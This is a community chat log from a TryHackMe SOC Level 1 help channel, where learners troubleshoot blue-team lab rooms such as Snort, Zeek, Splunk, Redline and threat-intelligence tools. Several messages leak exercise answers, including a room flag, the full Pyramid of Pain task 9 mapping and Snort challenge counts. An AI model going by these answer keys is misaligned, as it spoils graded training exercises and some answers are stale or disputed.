#soc-level-1-path

1 messages · Page 3 of 1

mortal magnet
#

in the "Threat Intelligence Tools" room, is saving the malicious email attachment in the TryHckMe VM, getting the the SHA256 sum with the command line tool, then removing the file a safe way to get the SHA256 hash to search on Talos? The VM isn't connected to the internet and it's basically just a sandbox, no? Even so, is there a safer way to get the hash?

mortal magnet
#

It just feels really sketchy to save something you know is malware, even if it's in a sandbox and you don't open it. Maybe that's just a feeling you have to get accostomed to when learning blue team stuff? 😅

timid dew
#

Hey there. I am currently doing the Kabana room. Looks like the answers to these questions have not been updated . It’s only accepting old answers despite the fact that vpn-connection is showing diff data and based on that , it’s not accepting those answers.

vagrant ledge
hazy kettleBOT
#

Gave +1 Rep to @timid dew (current: #1967 - 1)

limpid holly
#

Trying to do snort right now - the page itself is written as there would be no other network traffic until you start the script, but there's a bunch and it makes it a bit difficult to discern the traffic that supposedly comes from the script and check how the changes in use affect it
Is that intentional/unavoidable?

abstract fjord
#

what is a wireshark command that is not equel to tcp port 80

#

ive tried != !== not working

primal igloo
jovial fox
#

Heya. Can anyone recommend some Modules or Rooms where I can learn more about firewalls from a blue teaming perspective? Like how to set them up etc?

solid urchin
#

Hello Fellas, can someone help me access YARA LOKI?

lean monolith
#

Hi everyone, I'm doing the soc 1 learning path, but I'm interested in the 'Cyber Threat Intelligence' and 'Digital Forensics and Incident Response' modules. Should I follow the path as it is in THM or can I skip to those modules? I want to practice in Tryhackme because my college courses on these topics are mostly theoretical.

kindred pivot
modest warren
loud veldt
#

can anyone help me with this question I can not find the answer I even check the writeups but i think the room updated because in the writeups the questions are different

#

ca2dc5a3f94c4f19334cc8b68f256259 This is the md5 hash of redline

#

Room name : Intro to malware Analysis

primal igloo
#

What question are you having an issue with?

loud veldt
#

oh i just figured it out thanks

warm grotto
#

Can anyone tell me what font is used in Brim, in the Brim room?

neat yacht
#

hey guys.. i am currently training to be a Soc-analyst using the thm soc 1 pathway

nocturne cave
#

Hello guys, I am on the Threat Intelligence Tools Room and I want to download the 3 .eml files used for the task so that I can use phistool on my machine and analyze them. The problem is, I don't have the option to download those 3 .eml files. I think I am missing something obvious but from what I found on internet the room was created to self download the files on the private machine.

primal igloo
nocturne cave
hazy kettleBOT
#

Gave +1 Rep to @primal igloo (current: #2 - 1938)

primal igloo
nocturne cave
hazy kettleBOT
#

Gave +1 Rep to @primal igloo (current: #2 - 1939)

brave sierra
tepid hill
brave sierra
tepid hill
brave sierra
#

why it doesnt work ? what is the other optionhttps://tryhackme.com/room/windowslocalpersistence. task2

tepid hill
brave sierra
hazy surge
tepid hill
hazy surge
#

Will restart both machines

hazy surge
#

Still nothing. Does anyone have a fix to this??

tepid hill
slender hawk
floral otter
#

guys im on task 5 and for the questions its asking me to use thunderbird to analyse a email. When i open thunderbird using the attached vm its asking me to make a account. i dont want to make a account, and plus making a account on the attached vm would be useless because it resets evertime. what should i do?

floral otter
hazy kettleBOT
#

Gave +1 Rep to @primal igloo (current: #2 - 1973)

primal igloo
pure crow
#

How to fix this issue? Attackbox is glitching when i try to launch the room inside of it. I need to drop the downloaded file to the splunk add data and I cant do that if I dont download the file first on the launched room because when I click the download files it saves on my personal pc and i cant drop the file from my personal pc to attackbox.

#

How do I drop the file to the attackbox from my personal pc? Opening the room inside attackbox causes a glitch.

stone herald
#

@pure crow @hazy surge have you completed splunk201 room

#

Can you help me with task 9 q2

pure crow
pure crow
analog adder
#

i need help, im on a premium for this month. I connect the machine via VPN (sudo open VPN). It is connected but when i try to put the IP (site) on the browser of my own machine it shows nothing. but when i access it via split screen the site will show. how to solve this?

for referrence i am doing this "Task 18 [Day 12] Defence in depth Sleighing Threats, One Layer at a Time" of Advent of Cyber 2023.

#

i can only view the site via THM attack box and not on my machine even i am connected to VPN

#

VPN Server Name

EU-VIP-2
Internal Virtual IP Address

10.14.72.187
Server status

Online
Connection

Connected

primal igloo
analog adder
pearl socket
#

Hi Help me
I'm sure about answer but webapp thm say WRONG

#

somebody can help

#

pleassseee🥲

vagrant ledge
tepid hill
#

Folks don't usually give out answers directly as it defeats the purpose of the platform.

trail raptor
#

My friend has an interview coming up in the SOC field. The position mostly focuses on creating firewall rules, reverse engineering malware, and network security. He wants to know what rooms in THM would help him prepare for open ended questions/technical ones also.

Any advice would be appreciated

pearl socket
mint cliff
pearl socket
#

and I could build my solid base from the each it

mint cliff
pearl socket
#

not, SOC L1 in 2 weks

mint cliff
#

Then both will require at least a month

pearl socket
#

maybe, or more time because SOC L2 has more dificult rooms than SOC L1

#

as I said, depend of intensity (time per day), willing to learn, how quick you get each domain

lost snow
#

just finished 2 requisite path to this :), its somewhat fun and interesting

autumn crest
#

Hello all, I am currently in the Threat Intel Tools rooms and trying to do the phishing emails part. I am not entirely sure how to access the emails from the AttackBox to analyze them with PhishTool

gloomy turret
#

Guys, whats correct answear in room Benign - task 2 - last question ?

primal igloo
gloomy turret
#

shiat 😄

#

whats the correct answer ? any hunt pls ?

#

hint*

primal igloo
#

What are you using to search?

gloomy turret
#

nvm i got it finally ! 😄

solemn fox
#

Hello everyone, currently trying to finish up the Redline room but its just taking foreverrr for Redline to scan and import the analysis. This will be my 4th day or so trying to come back and finish it up because it takes so long to scan and import. I got an error not long ago for disk space being low as well when trying to import the analysis into Redline. Is it normally supposed to take an hour+ for it to scan? Then it takes 30 min+ to import the case. Thinking support may need to add more resources or something.

nocturne cave
#

Hi

floral otter
#

In snort task 9 it asks for me to create a snort rule and I do exactly that but it says “snort rule is missing port number” I literally don’t have a port number. I have a ip I’d but no port number. Anyone know why?

warm forge
#

hello guys

#

i need helpo

#

i am working on the zeek room and the attack machine is so slow

#

i have tried to scp the task files to my loacl machine so i can complete the task but its not working. is there any other way to get the task files so i can use my local machine to complete the task . help guys

warm forge
nocturne cave
#

I’m not certain that’s the answer and I can’t check atm but it’s something to look into

floral otter
#

Hm

#

You may be right

#

I’ll try when I get a chance

#

Thanks

nocturne cave
#

Hope it helps!

warm forge
# floral otter Hm

i also did check the said question. but i didnt see. what is the exact question. also you may need to investigate the pcap file to identify the port in question

lean apex
#

Hej guys, i have found SOC 1 MISP module Task 5 Answer 1 "error" as I have found the idd associated with PupyRat yet the filed does not accept the value, do you have any idea what might have gone wrong?

nocturne cave
#

Hello, I am in the Yara room on task 8-9 there are several tasks concerning a file called index.php, Loki will run on it just fine but when I look to run any other commands on it like strings in task 9 the machine tells me that the file doesnt exist. is there something I am missing? index.php does show up on the "ls" command to find the file

stone meteor
#

check the spelling you are using.

#

hint: ||some of the characters are numbers||

nocturne cave
#

I’ll check it out again later thanks!

lean apex
maiden trail
#

im in the exact same spot and im lost

fathom swanBOT
rare mirage
#

Threat Intelligence Tools Task 5 PhishTool. I'm a little annoyed that I can't get out to the internet from the AttackBox to analyze the email with PhishTool DekuBang imma read the raw file for the answers anyway but im still mad about it

primal igloo
rare mirage
hazy kettleBOT
#

Gave +1 Rep to @primal igloo (current: #2 - 2079)

scarlet lotus
#

Hey all,
I'm in Snort Challenge - The Basics ( Task-2 ) I need to investigate log files but when I run ls, I do not see any.

#

Help me please!

muted flame
shadow heath
#

Hi all,
Did anyone doing the Redline room in this path faced an issue of running out of storage on the disk while waiting for the program to create analysis out of the session file? I did everything as per guide in the room

#

My folder for the session was in Public Documents and it had around 10GB of data after the script was done and after I got that error from Redline.

gentle arch
shadow heath
hazy kettleBOT
#

Gave +1 Rep to @gentle arch (current: #2035 - 1)

solid urchin
#

Hello all. Why my snort keeps running “warning: no preprocessors configured for police 0”. I’m in the snort module exercise 6

scarlet lotus
shadow heath
shadow heath
# scarlet lotus Can you please lemme know in brief

The command that you need to run goes something like 'sudo snort - A full -r mx-3.pcap -c local.rules'.. this will tell snort to generate log files from the given pcap file thats in the directory for that task and you will use the same logic for all other tasks that you face.. Good luck

sly timber
#

Hey just letting you know something seems to be amiss with the snortchallenges1 task 2 set up. When I interrogate the pcap setting the number of packets to 65 I get the following as the last packet output (should be packet 65, no?):

#

However when I enter the values listed for the questions relating to packet 65, I'm being told the answers are incorrect

#

Command I'm using is nothing fancy: sudo snort -r mx-3.pcap -n 65

#

Either somethings borked somewhere, or I'm doing something wrong, and hey I've been known to make a mistake or two so it could be possible, but from what I understand from the snort rooms, my command should expose packet 65 as the last packet output from the snort commmand.

#

Also, I chose packet 65 as an example, there are other questions for which the details in the packets I arrive at are not accepted as the correct answer.

floral otter
scarlet lotus
#

Hey all!
I'm trying to get the signature logs. I did create signature rule as well for the task-5 to find the source IP. When I do ls, I do not see the signature.log files. Any help.

#

NVM! I found the mistake. I should include signature as well in the zeek command
zeek -C -r http.pcap -s http-password.sig

sly timber
# floral otter How many alerts are you getting

Well that was another oddity, because I did the rule wrong initially and only filtered for outbound connections to port 80, I saw 164 alerts put it in as my answer and it was accepted, then I fixed the rule and re-ran snort and received the expected number of alerts; 328. I'm not sure if the room would have accepted that answer since I had already entered the outbound only figure and it was accepted.

autumn crest
#

I am still not understanding how to analyse the emails in the Threat Intelligence room for Scenario 1 and 2. How am I supposed to check the attachments for the emails if I cant access internet?

tepid hill
autumn crest
#

No? Why would I do that?

primal igloo
#

ie phishing emails etc

autumn crest
#

Just saw a video where someone just started up a web server on that machine and downloaded the files to the attack box to be able to upload. I think I'm just going to follow that unless someone knows a better way

still goblet
#

I'm facing the problem in hash value. I mean
question: Analyse the report associated with the hash "b8ef959a9176aef07fdca8705254a163b50b49a17217a4ff0107487f59d4a35d" here. What is the filename of the sample?

I'm not getting what it is asking to do??

#

if anyone go with this pls explain? what exactly it is askin'

primal igloo
still goblet
still goblet
#

pyramid of pain > domain name > requesting to provide the first suspicious URL request I'm seeing in the report.
can anyone help me like where exactly I found the url request??

#

@primal igloo bro can you pls help?? if you take out come time it will be very greatfull for me 🙂

still goblet
raw abyss
#

Hello i'm in the BRIM room and i don't know if is it normal for the "Example Query" column not to display examples? Only when I highlight them

sly timber
#

Also noticed what I believe to be an incorrect answer in the wiresharktrafficanalysis (3rd of the wireshark trio). In task2 a question is asked like so: "Which scan type is used to scan the TCP port 80?" So I follow the relevant stream and got the following result:

#

According to notes (and my acquired knowledge) that's a TCP SYN Scan:

#

But the expected answer is TCP Connect, which is incorrect:

fast girder
#

Why i cannot upload a pic here?

#

security operations practical exam. How do i know the portal number, just guess. source IP and destination IP numbers are clear. Thanks

primal igloo
#

You need to verify

fathom swanBOT
unborn bolt
#

Hello everyone I am looking for advice: I am currently doing the SOC1 course but at the same time I am studying for the COMPTIA Security+ 701 exam and I feel somewhat overwhelm due to the fact that I am trying to build my skills but is Building the Skills the best option then studying for an exam? If this makes sense.

nocturne cave
unborn bolt
#

Maybe Im overthinking the process

worn verge
#

I would think logically, learning about processes and their overall roles in the Cybersecurity mindset, then learning the actual tools that be effectively used in them

#

Just IMO

hazy kettleBOT
#

Gave +1 Rep to @worn verge (current: #2054 - 1)

mental dragon
#

Hello, I'm having problems starting Yara Task 8. Is anyone having problems starting Yara? I tried several combinations on how to start it and none of what I tried seem to work.

mental dragon
#

Ok thank you @tepid hill

hazy kettleBOT
#

Gave +1 Rep to @tepid hill (current: #14 - 496)

floral otter
#

anyone elses grim whois lookup not working

onyx canopy
#

Hey all!

Im currently working through the SOC Analyst Level 1 path, and have come across an issue the "Snort" Room machine.

I had done task 4 fine, closed my browser and came back to it later in the day, now no matter what flags I add when running Snort, or wether I run it with sudo or not, i'm getting pages and pages of errors similar to the below:

***"WARNING: No preprocessors configured for policy 0.
04/11-13:52:20.828796 10.100.1.202:49284 -> 10.10.137.124:80
TCP TTL:64 TOS:0x0 ID:2911 IpLen:20 DgmLen:84 DF
AP Seq: 0x700B6427 Ack: 0xAFB00F0C Win: 0x183F TcpLen: 32
TCP Options (3) => NOP NOP TS: 1901165899 3098964094
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

(snort_decoder) WARNING: IP dgm len > captured len
WARNING: No preprocessors configured for policy 0.
WARNING: No preprocessors configured for policy 0.
04/11-13:52:20.829789 10.100.1.202:49284 -> 10.10.137.124:80
TCP TTL:64 TOS:0x0 ID:2912 IpLen:20 DgmLen:52 DF
A* Seq: 0x700B6447 Ack: 0xAFB0525A Win: 0x17EF TcpLen: 32
TCP Options (3) => NOP NOP TS: 1901165900 3098964103
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+"***

Am I doing something silly/missing something obvious, or is there a problem with the machine?

Thanks! 😄

floral otter
#

Basically the longer you let it scan the more network traffic is gonna be scanned

onyx canopy
hazy kettleBOT
#

Gave +1 Rep to @floral otter (current: #113 - 55)

floral otter
surreal oracle
#

Good night

I have a problem

i 'm studying SOC level 1 - SNORT

the machine has a script "traffic-generator.sh", But when you run it, it returns this error:

Error constructing proxy for org.gnome.Terminal:/org/gnome/Terminal/Factory0: Error calling StartServiceByName for org.gnome.Terminal: Timeout was reached

Do you know how to solve it or if I can talk to someone about it?

floral otter
surreal oracle
floral otter
#

whats right

surreal oracle
# floral otter whats right

Error constructing proxy for org.gnome.Terminal:/org/gnome/Terminal/Factory0: Error calling StartServiceByName for org.gnome.Terminal: Timeout was reached

#

I can't generate traffic

dry sluice
#

Going through wireshark:packet operations room, can someone pls explain why the display filter for the last question in task 5 would be dns.qry.type == 1 && dns.flags.response == 1 and not dns.qry.type == 1 when the question says "What is the number of "type A DNS Queries"?

elder hull
#

Wait, forget about that, now im also confused.

sly timber
#

There should be roughly double the count when counting both queries and responses

#

(correct_answer * 2) != correct_answer

random talon
#

Just finished level-1 path woot woot!

raw abyss
#

Hello i'm on the Velociraptor rooms and I don't understand something.
Why with the VQL Drilldown, the graph appaers like the picture. The data going back in time ? It's a display bug ?

prisma cypress
#

hey anyone here who can help out task9 Pyramid Of Pain plz dm

tough whale
#

Hello guys, Redline room is taking forever. There is anyway to take the session and run it on my computer ?

covert saddle
#

Hey Guys, maybe for the most of you guys this question will be "laughable" but im a really beginner in this world and im doing the SOC Level 1 - Pryamid of Pain: Task 9 where i have to match sentences to the pyramid of pain. In my (beginner) logic how i matched the sentences to the pyramid is the way to go but its sadly wrong and i would need some help with this task.
May there is some1 who can help me with?
Thanks all

blazing aurora
blazing aurora
blazing aurora
#

Velociraptor Room https://tryhackme.com/r/room/velociraptorhp
Task 4 - I don't see the KapeFiles Artifacts to select for new collection

I have completed the rest of the room but unable to get my instance to match the screenshots or steps of Task 4. The task calls for creating a New Collection based on the "Windows.KapeFiles.Targets" Artifacts and shows 3 search returns that have Windows in the results. I don't have any windows or kape results in my search (screenshot attached).
Have tried 4 different VM restarts over 2 days.
Not sure where to take that one next.

Ideas?

small arch
#

nooco — heute um 18:26 Uhr @#room-help
Hey!

First of all, thank you for creating the room:
Snort Challenge - The Basics.

I have a difficulty with task 2 - question 1 about "Write rule to detect all 80 TCP port traffic.
Could it be that TryHackMe does not accept the correct answer or is it really wrong 🙂 ?

Greetings from Germany

weary dew
#

For the task 9 of the pyramid of pain. The flag is ||THM{PYRAMIDS_COMPLETE}||

blazing aurora
muted flame
muted flame
muted flame
#

|| HIDE THE ANSWER USING DOUBLE PIPE ||

weary dew
hazy kettleBOT
#

Gave +1 Rep to @muted flame (current: #193 - 30)

small arch
# blazing aurora I've just tried it again and got the THM 'right' answer. If you want to share yo...

Thanks mickc. I helped me out by myself and found a post from nelbert:

nelbert — 15.04.2024 17:05
Update: dug around and looked, and it seems that using the bidirectional operator (<>) generates two alerts for packets depending on how you write the rules. It looks like ||328|| was previously accepted by THM as the correct answer but this must have been updated. ||Changing the rules to use -> instead of <> generates half the alerts (164) which is now accepted as the correct answer.||

hazy kettleBOT
#

Gave +1 Rep to @blazing aurora (current: #1372 - 2)

raw abyss
half barn
#

Hi! Can someone explain why my answer: 328 on how many packets is captured on the Snort Challenge - task 2 is wrong? (Resolved)

digital fiber
#

Hi guys, I'm struggling with Task 2- Writing IDS Rules(HTTP) in SOC Level 1 Snort Challenge - The Basics. First question: "What is the number of detected packets?", I got 328 but the answer is incorrect, i googled it and it seems the other get also the 328, can someone help me about that? (Resolved)

half barn
rough bear
#

actually it doesnt matter whether it is ssd or hdd

#

try it out:)

kindred vigil
#

guys, god night

#

guys
help me please
Can anyone help me with task 9 of the pain pyramid?
I'm not able to do the 9 because I'm Brazilian and I don't speak much English
The attacker has utilised these to accomplish their objective.

The attackers plans and objectives.

These signatures can be used to attribute payloads and artefacts to an actor.

An attacker has purchased this and used it in a typo-squatting campaign.

These addresses can be used to identify the infrastructure an attacker is using for their campaign.

These artefacts can present themselves as C2 traffic for example.

1 - TTP
2 - Tools
3 - Network
4 - Domain Names
5 - IP addresses
6 - Hash values
Can anyone please answer me?

rough bear
#

wow, the task was different when i solved it

#

TTPs - Obviously plans and objectives. The name Tactics, Techniques and Procedures tells for itself.

#

Tools - They are utilized to accomplish the objective. Different tools allow an adversary different opportunities. But the common thing of them is exploiting and gaining access.

#

Network Artifacts - These are the artifacts over the network such as user-agent string, C2 info, or URI patterns. If we detect them, we can block them, which will give a rough time for an adversary.

#

The rest try to figure out urself:)

kindred vigil
#

thanks bro!!!

half tendon
#

hello

#

whats the best tool for that ?

true turtle
#

I've heard about Clonezilla but u can ask someone more experienced than me

plush willow
# half tendon whats the best tool for that ?

I prefer FTK Imager Lite if you need to take a full disk image on a live system. If you need a full disk image of an offline system I would recommend using a boot disk like Paladin or CAINE assuming you arent pulling the internal hard drive. Otherwise, if you don't need a full disk image and just want to get the artifacts you need for analysis, I would recommend using KAPE which has various modules to collect specific artifacts and process the data using Eric Zimmerman's EZ tools.

lavish jasper
#

Hey everyone I am working the Snort Challenge - The Basics in the SOC 1 path. How do I get the snort log to display the msg from the rule. No matter how I'm reading the snort.logs I never see the msg "TCP request detected" (or whatever the msg might be) I am using "sudo snort -r snort.log.2714856" to read them. Are there other ways to better read these?

sacred perch
#

I just finished the three snort rooms and just wanted to say I actually enjoyed them 🙂 they're pretty engaging and hands on, it was fun

rough mesa
# kindred vigil guys help me please Can anyone help me with task 9 of the pain pyramid? I'm not ...

-TTP: The attackers plans and objectives.
-TOOLS: The attacker has utilised these to accomplish their objective.
-NETWORK: These artefacts can present themselves as C2 traffic for example.
-DOMAIN NAMES: An attacker has purchased this and used it in a typo-squatting campaign.
-IP ADDRESSES: These addresses can be used to identify the infrastructure an attacker is using for their campaign.
-HASH VALUES: These signatures can be used to attribute payloads and artefacts to an actor.

Come here when you are tired of researching, analyzing and thinking.

onyx canopy
#

Snort Challenge - The Basics: - Task 2 Question 1:

I've made the correct rule for detecting packets incoming and outgoing on port 80, have run snort and generated a log file, and have a result. I've double checked the result against multiple walkthroughs as I was sure I am doing it right, and they agree with my awnser, yet THM is still saying that the awnser is incorrect?

Any advice?

onyx canopy
hazy kettleBOT
#

Gave +1 Rep to @small arch (current: #2073 - 1)

small arch
#

definitely enjoyed doing it

tipsfedora

nimble oasis
onyx canopy
#

It seems that when I run snort with the same rules file it's throwing up different results each time, is this the correct behaviour?

#

Onto the Task 3 now, and yeah, I can run snort twice straight after one another and i'm getting a different number of "Total" packets each time?

nimble oasis
#

well then your rule is somehow funky

split geode
#

Hello!

I am in the Threat Intelligence Tools room, currently on Task #5 "PhishTool", and the questions indicate that I should use the PhishTool website which the task had me create an account with to solve the problems... but the VM isn't connected to the internet. What's the deal with that? How am I expected to analyze the file with no further instructions and no internet access on the VM?

I always feel like there a things missing from these TryHackMe rooms but maybe I'm just not used to how things work on this platform. Just seems odd that I should always have to dig into a Medium article/writeup to get the information I need. I know that prompts investigation but it seems like I'm constantly digging off site for answers and that not enough pointers are provided. Any help is appreciated.

I'm going to crosspost in #room-help so feel free to flag me or whatever I just don't know where to seek help for this stuff because the TryHackMe website just asks me to go on Discord.

primal igloo
vital bluff
#

Has anyone else had a problem with the Sysmon VM not working?

vagrant ledge
vital bluff
rough bear
#

Hello everyone. I got a question, is there a big difference between siem and edr. Especially if we are talking about Splunk and Wazuh. Both collect logs that can be analyzed in both instances. Can anyone clear this for me?

rough bear
#

appreciate it!

tepid hill
#

I wanted to use my own words to differentiate it, but then again, these experts can do it that much better.

royal valve
#

Does anyone know if there is an issue in the SNORET Writing IDS Rules (HTTP) i have run my rules, and it shows 328 packets, input that in the answer field and it comes up incorrect. I have reluctantly looked thru the writeups and the same anser im typing is what is getting credit in the writeups.

royal basin
#

If you compare this (from https://tryhackme.com/r/room/snort) to the rules you use, what are your rules actually matching? (edit: given that this is a week old, probably clear by now)

wanton vector
#

Nvm

#

I got correct one

#

I changed the rules

wanton vector
#

Btw where to choose roles ? @royal basin

wanton vector
royal basin
wanton vector
royal basin
# wanton vector I was confused because those online answers were wrong too

That is because the room used to be wrong and was then corrected. The walk-throughs were never updated. But heads up: The room author only corrected task 2 question 1. For the rest of the questions and task 3 (ftp afair) you better still follow the walk-throughs because if you do it right, your answers won't be accepted.

wanton vector
#

?

wanton vector
#

So that's why I used bi directional

#

@royal basin btw where is the role channel? I can't find it

primal igloo
#

You verify for roles.

fathom swanBOT
wanton vector
#

Thanks

wanton vector
#

@royal basin can I ssh into snort rooms? My wifi is trash and browser vm is slow as fk

royal valve
#

I figured it out and feel dumb for asking. Thank you @royal basin

hazy kettleBOT
#

Gave +1 Rep to @royal basin (current: #269 - 19)

wanton vector
worthy kelp
#

Hi, isn't the answer should be ||2||?
Which ControlSet contains the last known good configuration?
||and ControlSet002 will be the last known good configuration.||

brisk plover
#

hey is there a bug in Threat Intelligence Tools under Cisco Talos Intelligence with Whois search

floral otter
#

If so then yes

wanton vector
floral otter
brisk plover
brisk plover
primal igloo
brisk plover
#

2nd question

primal igloo
brisk plover
#

but for some reason not on talos

primal igloo
nimble oasis
#

ah yes talos

#

kinda messy to find some results depending on which talos page you are on

brisk plover
#

it has changed a bit comparing to the photos form task

dusk acorn
#

hey

past remnant
#

anyone good at command line searching event logs? i need a hand to get to the answers for Windows Events Log room

#

this stuff has way toooooo many options

#

so the question goes like this
'A Log clear event was recorded. What is the 'Event Record ID'?'

#

can't seem to find my way in searching for it correctly

royal basin
past remnant
#

well the goal of this room is to find what your looking for with Get-WinEvent

royal basin
#

That's another option

#

Sorry I missed your "command line"

past remnant
#

Get-WinEvent -path .\Desktop\merged.evtx | Where-Object{$_.Message -Like "Log clear"}

#

This does just nothing and the machine is like hanging

#

until i CTRL-C

royal basin
silent flower
#

HEY in rooms benign i cant connect to splunk
http://10.10.126.111:8000/ i try this from the attack box but unable to connect.. what am i doing wrong?

silent flower
#

found wht- didnt need the 8000

pearl herald
#

Splunk: Setting up a SOC Lab
task 3
I type the gollowing into the browser; http://coffely:8000/
nothing happens, I have spent the last 3hours on this room and nothing work, is there a customer service number for try hack me?

onyx canopy
#

Incident handling with Splunk - I'm probably being dense, but i've started the machine, started the attackbox, connected to the machines IP and the Splunk dashboard is showing, but there doesn't seem to be any data in Splunk? I've searched through all the Rooms folders and can't see anything relevant either, any help would be greatly appreciated 🙂

tropic yarrow
#

To anyone with a voucher and will love to give it away , I am kindly asking for it, so I could continue my learning for the SOC t1 please

arctic bronze
vagrant ledge
warm apex
#

is there an issue with Snort Challenge - The Basics Task 2 and task 3?. The ip addresses clearly show but what it is but the input is not taking it. Question 2 ,3 and 4, And for task 3 the total amount is not being accepted... found out it was worded incorrectly

versed epoch
#

for the task 5 in the soc1 threat intelligence tools room do i need to set up tunderberd on my system and do ssh to get the emails or just make an acount and use the split screen?

primal igloo
versed epoch
#

ok and now?

primal igloo
#

Open the emails?

versed epoch
#

requires a account setup

#

i managed to open it by doublecliking the email itself

onyx canopy
#

Morning all!

In the Redline Room, I'm struggling to get the analysis stage to work properly.

I have created the Redline script exactly how task 2 details, run the script as administrator, waited for it to finish.

When opening the "AnalysisSession1.mans," the analysis does not have any analysis data.

The only things in the left pane are, Timeline, Tags and Comments and Aquisition History.

I've restarted the machine multiple times, and have tried across the last few days, and get the same result every time.

Anyone aware of something I might be doing wrong or could this be some kind of bug?

#

The Analsis folder I create is over 7GB, so it would indicate that something is there?

versed epoch
#

Got hit by loki requesting root for a full analysis is that normal?

primal igloo
versed epoch
#

task 8

nocturne cave
#

the zeek room was kind of a beast but i enjoyed that

zealous geyser
trail cloak
#

Hello everyone,

I am currently taking the "Incident Handling with Splunk" course and I am stuck on the part where I need to detect the correct password for Joomla administration. I used this query:

index=botsv1 sourcetype=stream:http dest_ip="192.168.250.70" http_method=POST uri="/joomla/administrator/index.php" form_data=*username*passwd*
| table _time uri src_ip dest_ip form_data

This gives me the passwords that the attacker used to attempt to access Joomla. Can you please help me? Thank you in advance.

cunning lodge
#

I started this path a month ago and I finished it there was so much time spent boggling my mind but like that's how I learn. I just wanted to say for anyone on the fence about THM it is insanely helpful, for me it gave me a new side of cybersecurity I didn't know about and I found a real passion for threat intel/malware analysis/reverse engineering mostly from getting on the cyber side of youtube but if it weren't for THM I wouldn't have known where to start and would've definitely been a much more confusing process

leaden tapir
#

Hi.. want to ask... the answer in attackbox.. but consider as incorrect? and i did double check with some writeup and walkthrough too. i done it correctly. but why its wrong? hahaha

#

anyone have this issue?

cunning lodge
#

the ip should start with 216.

leaden tapir
#

sudo snort -c local.rules -r mx-3.pcap -A full -l .

sour cedar
haughty swan
#

Good evening everyone, I hope you're all well. I have a problem in the ItsyBitsy room, when I launch elastic, I'm not asked for a login or password and I access the empty elastic with no data to process. Has this ever happened to you? Have I missed something? Thanks in advance!

warped wind
leaden tapir
#

it just need a single line rule.. walk-through is 2 line rules.. which i dont understand why 2.

#

but just use single rule.. + given msg "<as in bold text">, then you good to find out the answer

#

its funny.. is that.. after i post it here.. i found the answer by my ownself. hahahaha..

haughty swan
#

Ok i got it, i had to change date to 3 years ago 😂, thanks for your help guys

warped wind
subtle field
#

Hey everyone
I had a question regarding " For Threat Intelligence Tools, Scenario 1" question 2 where it asks "From Talos Intelligence, the attached file can also be identified by the Detection Alias that starts with an H..."
I had acquired the hash for both the email and the attachement and placed both of them into Talos File Reputation but none of the Detection Alias options start with an "H"

#

I would appreciate any help or guidance on where I should be looking or advise on any mistakes I am making

toxic maple
#

snort

fierce frost
floral zodiac
#

Snort

keen basalt
#

Can anyone suggest me where not to waste much time (on silly things in some rooms) in the path ?

#

I am feeling like I am wasting my time on some room that I shouldn't.

tender salmon
#

~~Also in Threat Intelligence Tools's Scenario 1, ~~
"From Talos Intelligence, the attached file can also be identified by the Detection Alias that starts with an H..." this cannot be found anymore I think..
I've looked up the answer and I can't find it anywhere, I've changed Talos and VT
~~https://tryhackme.com/r/room/threatinteltools~~

I'm wrong.

TryHackMe

TryHackMe is a free online platform for learning cyber security, using hands-on exercises and labs, all through your browser!

zealous geyser
tender salmon
#

They look like this for example

zealous geyser
nimble oasis
#

yeah they updated the look some time ago

tender salmon
#

Aha

#

So would mine be updated then?

zealous geyser
#

The early ones are like yours

tender salmon
#

mine are old school

zealous geyser
#

yep

nimble oasis
tender salmon
#

scam :(

#

720 Points and I'm GOD

zealous geyser
#

I dont't think it's because of the points/level you have

tender salmon
#

I know, but just happy about that

pearl cliff
#

@tender salmon Search the attachments hash on virus total.

tender salmon
#

I did, it didn't show the expected result

#

MalwareBazaar just didn't give ANY result, Talos gave some but the one

#

Looked at screenshots of write-ups, the hashes did match so I didn't mess that up

pearl cliff
#

I just searched the md5sum of the attachment and got the answer.

tender salmon
#

I did the SHA256 as requested by websites

pearl cliff
#

Just checked that too, got a match.

tender salmon
#

Share screenshot in DMs?

#

I was looking at the wrong colom on VT...

#

I don't wanna talk about it

pearl cliff
#

lol, glad you got the answer.

tender salmon
#

Loki is throwing some errors
https://tryhackme.com/r/room/yara ```
cmnatic@thm-yara:~/tools/Loki$ python3 loki.py -h
Traceback (most recent call last):
File "loki.py", line 43, in <module>
from lib.lokilogger import *
File "/home/cmnatic/tools/Loki/lib/lokilogger.py", line 15, in <module>
from helpers import removeNonAsciiDrop
ModuleNotFoundError: No module named 'helpers'

TryHackMe

TryHackMe is a free online platform for learning cyber security, using hands-on exercises and labs, all through your browser!

novel ginkgo
#

opps my badge removed as they added new labs ? ok fine ....

vagrant ledge
primal igloo
tender salmon
#

just ben and ashu :(

hot thorn
#

yo guys , there is 19 chalenges that will be add today in socl1path ?

floral zodiac
#

19? I though just a few

hot thorn
#

19yes

nocturne cave
#

@hot thorn Yes - 19! 🙂 The update will be taking place shortly after 4PM BST (in the next 5-10 minutes)

nocturne cave
#

i'm excited for the extra content but i'm ready to finish this path and get on to pentest+ lol

trail zealot
#

Is there anyone who can help with a potential issue with a challenge in the Threat Intelligence Tools room that is part of the SOC 1 Path?

floral zodiac
#

Anyone having issues with the website?

tough breach
#

I was on earlier this morning, EST, and just got back on a few minutes ago too.

floral zodiac
#

Site is back up good to go

crystal fiber
scenic heron
#

@upper dew @fierce frost @leaden tapir the room has been bugged for a little while now. I've reported that issue some time ago and it's either not been fixed or deemed working as intended

upper dew
# scenic heron

for destination address of packet 63 not taken the last number it asking for 2 digits

scenic heron
#

i just tested the room with a single rule for port 80 and it's working as intended

#

at least for Q2 task 2

#

the destination IP is the one the room expects

fierce frost
scenic heron
#

I'm going step by step to confirm 100% but right now it seems fine

#

Just checked all the questions and their answers, it's working as intended now

fierce frost
#

the two that I'm missing is shown below, not sure why the answers I get don't work or are accepted

scenic heron
#

Yep, checked those as well. The correct answer is in the correct packet

#

So you have 2 rules written now, any 80 <> any any and any any <> any 80

#

that's why you have the wrong answer. You only need one of those rules

#

output with 2 rules

#

and correct output with 1 rule

primal igloo
keen basalt
#

Did not like Windows forensics 1/2, machine is too slow to load files.

quiet veldt
#

hi is there some bug on snort challenge basic? in the question number 2?
"Investigate the log file.

What is the destination address of packet 63?"

#

i already investigated it and found the ip i keep getting wrong answer

wintry gulch
#

